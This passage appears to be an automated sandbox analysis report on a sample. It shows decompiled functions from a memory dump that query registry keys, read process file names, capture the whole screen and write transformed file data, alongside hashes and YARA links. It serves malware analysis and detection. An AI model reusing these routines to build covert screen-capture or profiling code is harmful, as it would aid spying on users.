Instruction ID: 7395c4af1837315ae9011a525f06c5fc82e1a22bec7eb91195f490e5e8424017
Opcode Fuzzy Hash: 06d5e509e48cf5e6f34cfc1713bf35c5c0cec532718b5c270ec26c1f8e4708b8
Instruction Fuzzy Hash: 4A118074B00208FFD720DFA4DC85F9EB775AB58310F6086A9EA15A73D0C374AA46DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0E0, Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041B0E0() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				char* _t21;
				char* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0x4301f4; // 0x3b2bc12f
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t21 =  *0x432594; // 0xc17080
				_t13 = RegOpenKeyExA(0x80000002, _t21, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t24 =  *0x432224; // 0xc16b18
					_t25 = _v8;
					RegQueryValueExA(_v8, _t24, 0, 0,  &_v284,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return E00404354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28);
			}

0x0041b0e9
0x0041b0f0
0x0041b0f3
0x0041b105
0x0041b111
0x0041b119
0x0041b12a
0x0041b131
0x0041b135
0x0041b135
0x0041b13f
0x0041b158

APIs

RegOpenKeyExA.KERNEL32(80000002,00C17080,00000000,00020119,?), ref: 0041B111
RegQueryValueExA.KERNEL32(?,00C16B18,00000000,00000000,?,000000FF), ref: 0041B135
RegCloseKey.ADVAPI32(?), ref: 0041B13F

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 9854777b51662a1b4163059b4eb2929d234a9bfc70f81d67747477c2dc7c09a1
Instruction ID: e9006c33b1f3d5608eeeefafc4b86fdc27a5baa45399712a1b3837a38b7680d1
Opcode Fuzzy Hash: 9854777b51662a1b4163059b4eb2929d234a9bfc70f81d67747477c2dc7c09a1
Instruction Fuzzy Hash: F0018175A0020DBFDB08DF94ED56FEEB3B8EB48700F0041A9A605A7280EB746A44CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041B260, Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041B260() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				char* _t21;
				char* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0x4301f4; // 0x3b2bc12f
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t21 =  *0x4323d8; // 0xc17048
				_t13 = RegOpenKeyExA(0x80000002, _t21, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t24 =  *0x432480; // 0xc16b60
					_t25 = _v8;
					RegQueryValueExA(_v8, _t24, 0, 0,  &_v284,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return E00404354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28);
			}

0x0041b269
0x0041b270
0x0041b273
0x0041b285
0x0041b291
0x0041b299
0x0041b2aa
0x0041b2b1
0x0041b2b5
0x0041b2b5
0x0041b2bf
0x0041b2d8

APIs

RegOpenKeyExA.KERNEL32(80000002,00C17048,00000000,00020119,?), ref: 0041B291
RegQueryValueExA.KERNEL32(?,00C16B60,00000000,00000000,?,000000FF), ref: 0041B2B5
RegCloseKey.ADVAPI32(?), ref: 0041B2BF

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 1cf1f1c1e2cc4bbd7f63910e5a42fc97cd9555917660760b7f8267a608a4c158
Instruction ID: 6be965c5c923288808e501c7c14758c08100337a4ead401ed5fa8a82468b7490
Opcode Fuzzy Hash: 1cf1f1c1e2cc4bbd7f63910e5a42fc97cd9555917660760b7f8267a608a4c158
Instruction Fuzzy Hash: 42016275A0020DBFDB04DB94DD46FEEB3B8EB48700F1041A9A605A7280DA746A448B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041B460, Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041B460() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				char* _t21;
				char* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0x4301f4; // 0x3b2bc12f
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t21 =  *0x4321e0; // 0xc17008
				_t13 = RegOpenKeyExA(0x80000002, _t21, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t24 =  *0x432574; // 0xc16290
					_t25 = _v8;
					RegQueryValueExA(_v8, _t24, 0, 0,  &_v284,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return E00404354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28);
			}

0x0041b469
0x0041b470
0x0041b473
0x0041b485
0x0041b491
0x0041b499
0x0041b4aa
0x0041b4b1
0x0041b4b5
0x0041b4b5
0x0041b4bf
0x0041b4d8

APIs

RegOpenKeyExA.KERNEL32(80000002,00C17008,00000000,00020119,?), ref: 0041B491
RegQueryValueExA.KERNEL32(?,00C16290,00000000,00000000,?,000000FF), ref: 0041B4B5
RegCloseKey.ADVAPI32(?), ref: 0041B4BF

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 5543fc9e14794ebc2460d778d5a0a552370f5e5fa382d45e8362d85d34f91f06
Instruction ID: 73bd3a17dc5699dde7e36c61eca224ba4d86d069b81c3616f5d6a749abcba002
Opcode Fuzzy Hash: 5543fc9e14794ebc2460d778d5a0a552370f5e5fa382d45e8362d85d34f91f06
Instruction Fuzzy Hash: D7018175A0020CBFDB08DFA4DD46FEEB3B8EB48700F0041ADE605A7280DB746A448F98

Uniqueness

Uniqueness Score: -1.00%

Function 0041A600, Relevance: 4.5, APIs: 3, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041A600(long _a4) {
				void* _v8;
				signed int _v12;
				char _v276;
				signed int _t10;
				intOrPtr _t19;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t10 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t10 ^ _t26;
				_v8 = OpenProcess(0x410, 0, _a4);
				if(_v8 != 0) {
					_t23 = _v8;
					 *0x4327f0(_v8, 0,  &_v276, 0x104); // executed
					CloseHandle(_v8);
				}
				return E00404354( &_v276, _t19, _v12 ^ _t26, _t23, _t24, _t25);
			}

0x0041a609
0x0041a610
0x0041a624
0x0041a62b
0x0041a63b
0x0041a63f
0x0041a649
0x0041a649
0x0041a662

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 0041A61E
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041A63F
CloseHandle.KERNEL32(00000000), ref: 0041A649

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: ec1565238759391ab5efba537afc77da55aa47769eb43047e291d2dab299360a
Instruction ID: 1d1b37563283dd2e0880c91a50c3a5397273ca56bd8ac06d4b12f4a0aad7b886
Opcode Fuzzy Hash: ec1565238759391ab5efba537afc77da55aa47769eb43047e291d2dab299360a
Instruction Fuzzy Hash: D1F03074A0020CEFDB08EFA4DD4ABED77B4FB08704F1015A9EA1597290D6B46A84DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00415750, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415750(signed int _a4, signed int _a8, signed short* _a12) {
				signed int _v8;
				signed char _v9;
				signed int _t97;
				signed int _t99;

				if(_a8 < 1 || _a8 > 8) {
					_v9 = 0;
				} else {
					_v9 = 1;
				}
				E004147B0(_a4, _v9 & 0x000000ff, "bad pack level");
				 *((intOrPtr*)(_a4 + 0x6af78)) = 0;
				if( *((intOrPtr*)(_a4 + 0x6af70)) == 0) {
					 *((intOrPtr*)(_a4 + 0x6af78)) = 1;
					 *((intOrPtr*)(_a4 + 0x6af70)) = 0x10000;
				}
				 *((intOrPtr*)(_a4 + 0x6af6c)) = 0;
				E004091C0(_a4 + 0x4af70, 0, 0x1fffc);
				 *(_a4 + 0x6af98) =  *(0x4293b2 + _a8 * 8) & 0x0000ffff;
				 *(_a4 + 0x6af9c) =  *(0x4293b0 + _a8 * 8) & 0x0000ffff;
				 *(_a4 + 0x6afa0) =  *(0x4293b4 + _a8 * 8) & 0x0000ffff;
				 *(_a4 + 0x6af94) =  *(0x4293b6 + _a8 * 8) & 0x0000ffff;
				if(_a8 > 2) {
					if(_a8 >= 8) {
						 *_a12 =  *_a12 & 0x0000ffff | 0x00000002;
					}
				} else {
					 *_a12 =  *_a12 & 0x0000ffff | 0x00000004;
				}
				 *((intOrPtr*)(_a4 + 0x6af84)) = 0;
				 *((intOrPtr*)(_a4 + 0x6af74)) = 0;
				_v8 = 0x8000;
				_v8 = _v8 << 1;
				_t97 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc))))(_a4, _a4 + 0x1af70, _v8); // executed
				 *((intOrPtr*)(_a4 + 0x6af90)) = _t97;
				if( *((intOrPtr*)(_a4 + 0x6af90)) == 0) {
					L12:
					 *((intOrPtr*)(_a4 + 0x6af8c)) = 1;
					 *((intOrPtr*)(_a4 + 0x6af90)) = 0;
					return _t97;
				}
				_t97 = _a4;
				if( *((intOrPtr*)(_t97 + 0x6af90)) == 0xffffffff) {
					goto L12;
				}
				 *((intOrPtr*)(_a4 + 0x6af8c)) = 0;
				if( *((intOrPtr*)(_a4 + 0x6af90)) < 0x106) {
					E00415190(_a4); // executed
				}
				_t99 = _a4;
				 *((intOrPtr*)(_t99 + 0x6af7c)) = 0;
				_v8 = 0;
				while(_v8 < 2) {
					_t99 = ( *(_a4 + 0x6af7c) << 0x00000005 ^  *(_a4 + _v8 + 0x1af70) & 0x000000ff) & 0x00007fff;
					 *(_a4 + 0x6af7c) = _t99;
					_v8 = _v8 + 1;
				}
				return _t99;
			}

0x0041575a
0x00415768
0x00415762
0x00415762
0x00415762
0x0041577a
0x00415785
0x00415799
0x0041579e
0x004157ab
0x004157ab
0x004157b8
0x004157d3
0x004157e9
0x004157fd
0x00415811
0x00415825
0x0041582f
0x00415846
0x00415854
0x00415854
0x00415831
0x0041583d
0x0041583d
0x0041585a
0x00415867
0x00415871
0x0041587d
0x00415897
0x0041589f
0x004158af
0x004158bd
0x004158c0
0x004158cd
0x00000000
0x004158cd
0x004158b1
0x004158bb
0x00000000
0x00000000
0x004158dc
0x004158f3
0x004158f9
0x004158fe
0x00415901
0x00415904
0x0041590e
0x00415920
0x00415941
0x00415949
0x0041591d
0x0041591d
0x00415954

APIs

_memset.LIBCMT ref: 004157D3

Strings

bad pack level, xrefs: 0041576C

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID: bad pack level
API String ID: 2102423945-4081416248
Opcode ID: f6e3563300c5ab7fbcaddfc0a056989f21a9984ce5978ca3c77e3936c26ea850
Instruction ID: 6f537c8d364d3cc6a5b59f8cb3aad8492bc240588aa9eb411482bf6566fffcb9
Opcode Fuzzy Hash: f6e3563300c5ab7fbcaddfc0a056989f21a9984ce5978ca3c77e3936c26ea850
Instruction Fuzzy Hash: 415136B4600208EBDB04DF54C454BEA3BB2BB85358F148279EC595F381C379AA92CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00416EC0, Relevance: 3.1, APIs: 2, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416EC0(void* __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t39;
				intOrPtr _t49;
				intOrPtr _t50;

				_v16 = __ecx;
				 *(_v16 + 0x7c) = 0;
				 *(_v16 + 0x84) = 0;
				 *((char*)(_v16 + 0x80)) = 0;
				 *(_v16 + 0x78) = 0;
				 *(_v16 + 0x70) = 0;
				 *(_v16 + 0x90) = 0;
				 *(_v16 + 0x74) = 0;
				if(_a4 != 0) {
					_t31 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
					_v12 = _t31;
					if(_v12 != 0xffffffff) {
						_t32 = E00416D00(_t39, _v16, _t49, _t50, _v12, 0); // executed
						_v8 = _t32;
						if(_v8 == 0) {
							 *((char*)(_v16 + 0x80)) = 1;
							return 0;
						}
						CloseHandle(_v12);
						return _v8;
					}
					return 0x200;
				}
				return 0x10000;
			}

0x00416ec6
0x00416ecc
0x00416ed6
0x00416ee3
0x00416eed
0x00416ef7
0x00416f01
0x00416f0e
0x00416f19
0x00416f35
0x00416f3b
0x00416f42
0x00416f54
0x00416f59
0x00416f60
0x00416f74
0x00000000
0x00416f7b
0x00416f66
0x00000000
0x00416f6c
0x00000000
0x00416f44
0x00000000

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00416F35

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8f91cfc9fba5c32f4fbb937fef25f28ce00c47214f76ddcd96d078623111c708
Instruction ID: b3512dad5386af28eed852f120763f789d947be643a00485d0e3b5c0498a9e9f
Opcode Fuzzy Hash: 8f91cfc9fba5c32f4fbb937fef25f28ce00c47214f76ddcd96d078623111c708
Instruction Fuzzy Hash: 3F210074E04208EFDB10DFA4D459BDDBBB0FB04304F1081AAE9156B3D1C7759A86DB44

Uniqueness

Uniqueness Score: -1.00%

Function 0041A9D0, Relevance: 3.0, APIs: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041A9D0() {
				char _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				int _v40;

				E00403FD0( &_v36, 0, 0, 0);
				_v36 = 1;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				 *0x4328b0( &_v8,  &_v36, 0); // executed
				_v40 = 0;
				_v20 = 0;
				_v16 = GetSystemMetrics(0);
				_v12 = GetSystemMetrics(1);
				E0041A940(_v40, _v20, _v16 - _v40, _v12 - _v20); // executed
				return  *0x432890(_v8);
			}

0x0041a9df
0x0041a9e4
0x0041a9eb
0x0041a9f2
0x0041a9f9
0x0041aa0a
0x0041aa10
0x0041aa17
0x0041aa26
0x0041aa31
0x0041aa4a
0x0041aa5f

APIs

GetSystemMetrics.USER32(00000000), ref: 0041AA20
GetSystemMetrics.USER32(00000001), ref: 0041AA2B

Part of subcall function 0041A940: CreateCompatibleDC.GDI32(00000000), ref: 0041A948
Part of subcall function 0041A940: GetDC.USER32(00000000), ref: 0041A95B
Part of subcall function 0041A940: CreateCompatibleBitmap.GDI32(00000000), ref: 0041A962
Part of subcall function 0041A940: SelectObject.GDI32(?,?), ref: 0041A973
Part of subcall function 0041A940: GetDC.USER32(00000000), ref: 0041A988
Part of subcall function 0041A940: BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0041A99F
Part of subcall function 0041A940: DeleteObject.GDI32(?), ref: 0041A9B7

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CompatibleCreateMetricsObjectSystem$BitmapDeleteSelect
String ID:
API String ID: 2392011222-0
Opcode ID: 2a24e5050d5877b703e70a7b37d0a216ffb4f14afde7beb3bbab4e31ddefb657
Instruction ID: 5a6354b42c1b56eb3e3fbefa3fa20da0826f8f0706aa57b64b182fa8f0be3d4e
Opcode Fuzzy Hash: 2a24e5050d5877b703e70a7b37d0a216ffb4f14afde7beb3bbab4e31ddefb657
Instruction Fuzzy Hash: 1211E1B5D00209AFDB04EFD4DD49BEEBBB8FB08704F104159E505B7280D7B56A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405EA3, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405EA3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t20;
				signed int _t22;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;

				_push(0xc);
				_push(0x42dd10);
				E00408C20(__ebx, __edi, __esi);
				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t35 = _t32;
				_t36 = _t35 != 0;
				if(_t35 != 0) {
					__eflags =  *(_t32 + 0xc) & 0x00000040;
					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
						E004099B9(_t32);
						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
						_t20 = E00405E36(__ebx, __edx, _t32); // executed
						 *(_t33 - 0x1c) = _t20;
						 *(_t33 - 4) = 0xfffffffe;
						E00405F0F(_t32);
					} else {
						_t9 = _t32 + 0xc;
						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
						__eflags =  *_t9;
					}
					_t22 =  *(_t33 - 0x1c);
				} else {
					 *((intOrPtr*)(E00405A49(_t36))) = 0x16;
					_t22 = E00407461() | 0xffffffff;
				}
				return E00408C65(_t22);
			}

0x00405ea3
0x00405ea5
0x00405eaa
0x00405eaf
0x00405eb5
0x00405eb8
0x00405ebd
0x00405ebf
0x00405ed6
0x00405eda
0x00405eea
0x00405ef0
0x00405ef5
0x00405efb
0x00405efe
0x00405f05
0x00405edc
0x00405edc
0x00405edc
0x00405edc
0x00405edc
0x00405ee0
0x00405ec1
0x00405ec6
0x00405ed1
0x00405ed1
0x00405ee8

APIs

Part of subcall function 00405A49: __getptd_noexit.LIBCMT ref: 00405A49

__lock_file.LIBCMT ref: 00405EEA

Part of subcall function 004099B9: __lock.LIBCMT ref: 004099DE

__fclose_nolock.LIBCMT ref: 00405EF5

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 3fc3483712a525cd96c649c7fe8882c4f1071fa44ab2443346d3945ffceb5c37
Instruction ID: 1319f6abd8bd31aeb109ac581f584733085f37c6932f77d10f7e7e49bf8bce39
Opcode Fuzzy Hash: 3fc3483712a525cd96c649c7fe8882c4f1071fa44ab2443346d3945ffceb5c37
Instruction Fuzzy Hash: 76F09630915B15DAD720AB76D80675F7AA0EF00338F20863FE4A5B61D1CB7C5A019E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401C70, Relevance: 3.0, APIs: 2, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00401C70(intOrPtr _a4) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _t15;
				void* _t18;
				void* _t19;

				_v8 = 0;
				if(_a4 > 0) {
					__eflags = _a4 - 0xffffffff;
					if(__eflags > 0) {
						L4:
						E00401000( &_v20, 0);
						E00407185( &_v20, 0x42e190);
					} else {
						_push(_a4); // executed
						_t15 = E00404E60(_t18, _t19, __eflags); // executed
						_v8 = _t15;
						__eflags = _v8;
						if(_v8 == 0) {
							goto L4;
						}
					}
				} else {
					_a4 = 0;
				}
				return _v8;
			}

0x00401c76
0x00401c81
0x00401c8c
0x00401c90
0x00401ca7
0x00401cac
0x00401cba
0x00401c92
0x00401c95
0x00401c96
0x00401c9e
0x00401ca1
0x00401ca5
0x00000000
0x00000000
0x00401ca5
0x00401c83
0x00401c83
0x00401c83
0x00401cc5

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 00401CAC
__CxxThrowException@8.LIBCMT ref: 00401CBA

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throwstd::bad_exception::bad_exception
String ID:
API String ID: 953301-0
Opcode ID: 03a4dc33bab742cb4b2cbf9fa26e5d2c586a382265b7fc5880515f717db27dfc
Instruction ID: 272cba5438db19222770af037817bcfe661f5254e9f30bb7c7a9615170098c4c
Opcode Fuzzy Hash: 03a4dc33bab742cb4b2cbf9fa26e5d2c586a382265b7fc5880515f717db27dfc
Instruction Fuzzy Hash: C8F05E70844208EAEB10EFA0C845BAE7774AB00359F20866EA9156B2D0D7789A84C78A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDC3, Relevance: 3.0, APIs: 2, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040DDC3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t3;
				void* _t9;
				void* _t13;
				intOrPtr _t15;
				intOrPtr _t16;

				_push(8);
				_push(0x42dfa8);
				_t3 = E00408C20(__ebx, __edi, __esi);
				_t15 =  *0x431cdc; // 0x1
				if(_t15 == 0) {
					E0040B23F(6);
					 *((intOrPtr*)(_t13 - 4)) = 0;
					_t16 =  *0x431cdc; // 0x1
					if(_t16 == 0) {
						E0040D6E2(__ebx, _t9, __edi, 0, _t16); // executed
						 *0x431cdc =  *0x431cdc + 1;
					}
					 *((intOrPtr*)(_t13 - 4)) = 0xfffffffe;
					_t3 = E0040DE09();
				}
				return E00408C65(_t3);
			}

0x0040ddc3
0x0040ddc5
0x0040ddca
0x0040ddd1
0x0040ddd7
0x0040dddb
0x0040dde1
0x0040dde4
0x0040ddea
0x0040ddec
0x0040ddf1
0x0040ddf1
0x0040ddf7
0x0040ddfe
0x0040ddfe
0x0040de08

APIs

__lock.LIBCMT ref: 0040DDDB

Part of subcall function 0040B23F: __mtinitlocknum.LIBCMT ref: 0040B255
Part of subcall function 0040B23F: __amsg_exit.LIBCMT ref: 0040B261
Part of subcall function 0040B23F: EnterCriticalSection.KERNEL32(00000000,00000000,?,00408368,0000000D), ref: 0040B269

__tzset_nolock.LIBCMT ref: 0040DDEC

Part of subcall function 0040D6E2: __lock.LIBCMT ref: 0040D704
Part of subcall function 0040D6E2: ____lc_codepage_func.LIBCMT ref: 0040D74B
Part of subcall function 0040D6E2: __getenv_helper_nolock.LIBCMT ref: 0040D76D
Part of subcall function 0040D6E2: _free.LIBCMT ref: 0040D7A4
Part of subcall function 0040D6E2: _strlen.LIBCMT ref: 0040D7AB
Part of subcall function 0040D6E2: __malloc_crt.LIBCMT ref: 0040D7B2
Part of subcall function 0040D6E2: _strlen.LIBCMT ref: 0040D7C8
Part of subcall function 0040D6E2: _strcpy_s.LIBCMT ref: 0040D7D6
Part of subcall function 0040D6E2: __invoke_watson.LIBCMT ref: 0040D7EB
Part of subcall function 0040D6E2: _free.LIBCMT ref: 0040D7FA

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: e4ed26e4e3832f4c199716b3ed4776796449f331cac361f6c8396f43c81a425a
Instruction ID: d2da852c4dad56ae2dda77e0fdb5a89a1e09ad3610fc53b026902743cb7d952d
Opcode Fuzzy Hash: e4ed26e4e3832f4c199716b3ed4776796449f331cac361f6c8396f43c81a425a
Instruction Fuzzy Hash: 27E0EC34D81A909AD6257BE2AA0221DB630AB14B25F60617FB4413A5E2CE780985DBED

Uniqueness

Uniqueness Score: -1.00%

Function 00416F90, Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00416F90(intOrPtr __ecx, void* __edi, void* __esi, void* _a4, signed int _a8) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed char _t101;
				void* _t102;
				intOrPtr _t110;
				intOrPtr _t113;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t148;
				void* _t149;
				void* _t150;

				_t149 = __esi;
				_t148 = __edi;
				_v28 = __ecx;
				_v8 = _a4;
				if(( *(_v28 + 0x2d) & 0x000000ff) == 0) {
					L11:
					_t110 = _v28;
					__eflags =  *((intOrPtr*)(_t110 + 0x20));
					if( *((intOrPtr*)(_t110 + 0x20)) == 0) {
						_t128 = _v28;
						__eflags =  *((intOrPtr*)(_t128 + 4));
						if( *((intOrPtr*)(_t128 + 4)) == 0) {
							 *((intOrPtr*)(_v28 + 0x14)) = 0x1000000;
							__eflags = 0;
							return 0;
						}
						WriteFile( *(_v28 + 4), _v8, _a8,  &_v16, 0); // executed
						return _v16;
					}
					_t131 = _v28;
					_t113 = _v28;
					__eflags =  *((intOrPtr*)(_t131 + 0x24)) + _a8 -  *((intOrPtr*)(_t113 + 0x28));
					if( *((intOrPtr*)(_t131 + 0x24)) + _a8 <  *((intOrPtr*)(_t113 + 0x28))) {
						E00409240( *((intOrPtr*)(_v28 + 0x20)) +  *((intOrPtr*)(_v28 + 0x24)), _v8, _a8);
						 *((intOrPtr*)(_v28 + 0x24)) =  *((intOrPtr*)(_v28 + 0x24)) + _a8;
						return _a8;
					}
					 *((intOrPtr*)(_v28 + 0x14)) = 0x30000;
					return 0;
				}
				if( *(_v28 + 0x3c) != 0 &&  *((intOrPtr*)(_v28 + 0x40)) < _a8) {
					_v20 =  *(_v28 + 0x3c);
					_push(_v20);
					E00404E04();
					_t150 = _t150 + 4;
					 *(_v28 + 0x3c) = 0;
				}
				if( *(_v28 + 0x3c) == 0) {
					_push(_a8 << 1);
					_t102 = E00404E60(_t148, _t149, _a8 << 1);
					_t150 = _t150 + 4;
					_v24 = _t102;
					 *(_v28 + 0x3c) = _v24;
					 *((intOrPtr*)(_v28 + 0x40)) = _a8;
				}
				E00409240( *(_v28 + 0x3c), _a4, _a8);
				_t150 = _t150 + 0xc;
				_v12 = 0;
				while(1) {
					_t157 = _v12 - _a8;
					if(_v12 >= _a8) {
						break;
					}
					_t101 = E00415150( *( *(_v28 + 0x3c) + _v12) & 0x000000ff, _t157, _v28 + 0x30,  *( *(_v28 + 0x3c) + _v12) & 0x000000ff);
					_t150 = _t150 + 8;
					 *( *(_v28 + 0x3c) + _v12) = _t101;
					_v12 =  &(_v12->Internal);
				}
				_v8 =  *(_v28 + 0x3c);
				goto L11;
			}

0x00416f90
0x00416f90
0x00416f96
0x00416f9c
0x00416fa8
0x00417072
0x00417072
0x00417075
0x00417079
0x004170cd
0x004170d0
0x004170d4
0x004170f9
0x00417100
0x00000000
0x00417100
0x004170eb
0x00000000
0x004170f1
0x0041707b
0x00417084
0x00417087
0x0041708a
0x004170af
0x004170c3
0x00000000
0x004170c6
0x0041708f
0x00000000
0x00417096
0x00416fb5
0x00416fc8
0x00416fce
0x00416fcf
0x00416fd4
0x00416fda
0x00416fda
0x00416fe8
0x00416fef
0x00416ff0
0x00416ff5
0x00416ff8
0x00417001
0x0041700a
0x0041700a
0x0041701c
0x00417021
0x00417024
0x00417036
0x00417039
0x0041703c
0x00000000
0x00000000
0x00417053
0x00417058
0x00417064
0x00417033
0x00417033
0x0041706f
0x00000000

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7858a3b50a38d43f7186cb67725564ddc32f162765d96639dd17643347e3bc90
Instruction ID: e73484e99212a659770e5822a14c3b4fdeb48280c6f1479436057133cb9a09cf
Opcode Fuzzy Hash: 7858a3b50a38d43f7186cb67725564ddc32f162765d96639dd17643347e3bc90
Instruction Fuzzy Hash: A551C8B4E04209EFCB44CF98D481EAEBBB2BF88314F108159EA05AB345D735E981CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004019C0, Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004019C0(void* __eflags, signed int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				void* __ecx;
				signed int _t50;
				intOrPtr _t61;
				void* _t66;
				intOrPtr* _t74;
				signed int _t109;
				void* _t110;

				_push(0xffffffff);
				_push(E00426770);
				_push( *[fs:0x0]);
				_push(_t74);
				_t50 =  *0x4301f4; // 0x3b2bc12f
				_push(_t50 ^ _t109);
				 *[fs:0x0] =  &_v16;
				_v20 = _t110 - 0x14;
				_v32 = _t74;
				_v28 = _a4 | 0x0000000f;
				if(E00401980(_v32) >= _v28) {
					if( *(_v32 + 0x14) >> 1 > _v28 / 3) {
						if( *(_v32 + 0x14) > E00401980(_v32) - ( *(_v32 + 0x14) >> 1)) {
							_v28 = E00401980(_v32);
						} else {
